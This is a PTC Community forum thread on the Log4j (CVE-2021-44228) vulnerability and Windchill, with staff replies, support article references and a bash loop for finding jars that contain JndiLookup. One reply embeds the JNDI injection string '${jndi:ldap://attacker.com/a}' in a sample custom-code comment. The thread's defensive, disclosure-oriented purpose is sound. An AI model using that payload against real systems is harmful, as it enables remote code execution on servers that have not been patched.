12-Amethyst

Solved

Log4j vulnerability

Forum|Forum|4 years ago
December 11, 2021
5 replies
9658 views

Just opening this thread as I haven't seen it anywhere else. Have the been any talks about the log4j exploit and Windchill? We are on Windchill 11 so I would assume we are open to the vulnerability but haven't seen anything mentioning it anywhere on PTC's sites. Just looking to get ahead of this in any way possible.

Figured I would open this thread publicly instead of a support case as it is affecting everyone.

Announcements

Best answer by Jean-Christophe

Hi @ErikZabokrtsky .

As @ScottMorris reponsed, PTC is aware of the issue and our cyber security team has been actively investigating any potential impact. As of now, no exploitable issues in PTC’s software have yet been discovered, but our investigation is continuing.

Please refer to this mini-site in order to get the latest updates on this investigation.

In case of any issue or doubt, please contact our Technical Support team.

Thank you.

--JC

S

ScottMorris

17-Peridot

good timing, i was just searching the ptc support site and could not find anything. we are on WC11.1 and the security team is looking for an immediate action. i am going to submit a high priority case to make sure ptc is aware of the issue.

S

ScottMorris

17-Peridot

PTC Technical Support Repose:
PTC R&D team and Security Team are actively working on priority for Log4j2 vulnerability CVE-2021-44228 reported.
The log4j version used by Windchill can detected by referring article. https://www.ptc.com/en/support/article/CS358667
PTC Security Experts will roll out an official communication soon about this CVE, its impact for customers & the next actions soon.

24-Ruby III

Answer

14-Alexandrite

Hi @ErikZabokrtsky .

As @ScottMorris reponsed, PTC is aware of the issue and our cyber security team has been actively investigating any potential impact. As of now, no exploitable issues in PTC’s software have yet been discovered, but our investigation is continuing.

Please refer to this mini-site in order to get the latest updates on this investigation.

In case of any issue or doubt, please contact our Technical Support team.

Thank you.

--JC

R

RandyJones

20-Turquoise

@Jean-Christophe wrote:

Hi @ErikZabokrtsky .

As @ScottMorris reponsed, PTC is aware of the issue and our cyber security team has been actively investigating any potential impact. As of now, no exploitable issues in PTC’s software have yet been discovered, but our investigation is continuing.

I hope they are also taking into account custom code like this:

WTPart part;
//part name = "${jndi:ldap://attacker.com/a}"
Logger log = LogR.getLogger(MyCustomClass.class.getName());
log.error("Is this an issue?? part name: " + part.getName());

J

Jean-Christophe

14-Alexandrite

Thank you for the suggestion, @RandyJones

Our security team has been extensively testing, but I will pass over your suggestion.

R

rhart

16-Pearl

Hi @Jean-Christophe ,

Please could you pass on the question whether Office Workers are vulnerable, we found log4j-core-2.11.1.jar in Adobe Experience Manager (provided by PTC as part of Creo View Office Worker Adapters)

We can't find anything on regarding the workers the PTC support website.

Regards

Rob

J

Jean-Christophe

14-Alexandrite

Hi @rhart ,

Please be aware that we have created a minisite to act as a more comprehensive hub on this situation

I will pass over your question to the security team. In parallel, I encourage that you engage our support team for a closer assistance on your question

V

VladimirN

24-Ruby III

@Jean-Christophe wrote:

... In parallel, I encourage that you engage our support team for a closer assistance on your question

"Case Logger": https://www.ptc.com/en/support/case-logger

R

RandyJones

20-Turquoise

Following is something one can use to find any jar file that contains the JndiLookup class or any class/path that contains the string JndiLookup. Because it is using "grep -i" this is a case insensitive search. This is what we used to find "affected" jar files in our Solr install This is sh or bash.

cd /opt/ptc/Windchill/Solr/SolrServer
for jar in `find . -name '*.jar' -print`
do
 if [ "`jar tvf "$jar" | grep -i JndiLookup`" != "" ]; then
 echo Issue in $jar
 fi
done

H

HaithemBouajila_362234

7-Bedrock

Dear all,

Do know if there is an impact on Windchill 11.0 M30 and older versions ?

The PTC article CS358789 seems to only cover 11.1 to 12.x

According to CS358667 it seems that these files are used there ?

Regards,

Haithem

Y

yteng

17-Peridot

Hello @HaithemBouajila_362234

As stated in CS358789, Windchill 11.1 M020 and earlier(including 11.0 M030 and older versions) are using log4j 1.x, so it should be not vulnerable.
* PTC security teams is continuously monitors and analyzes supported Windchill releases for any reported critical or high CVE.
Please always check the latest CS358789 for updates.

3rd party bundled components may still be vulnerable, please:
Solr: Refer to CS359011, Solr of old Windchill releases (10.1, 10.2, 11.0) is not impacted by CVE-2021-44228.
Cognos: Refer to CS359007 and IBM update page An update on the Apache Log4j CVE-2021044228 vulnerability.
Tibco: Refer to CS359008 and TIBCO published article: TIBCO Log4j Vunerability Daily Update.

Thanks,

Susan

Sign up

Please use your PTC eSupport account.

Welcome to the PTC Community

Please use your PTC eSupport account.

Scanning file for viruses.

This file cannot be downloaded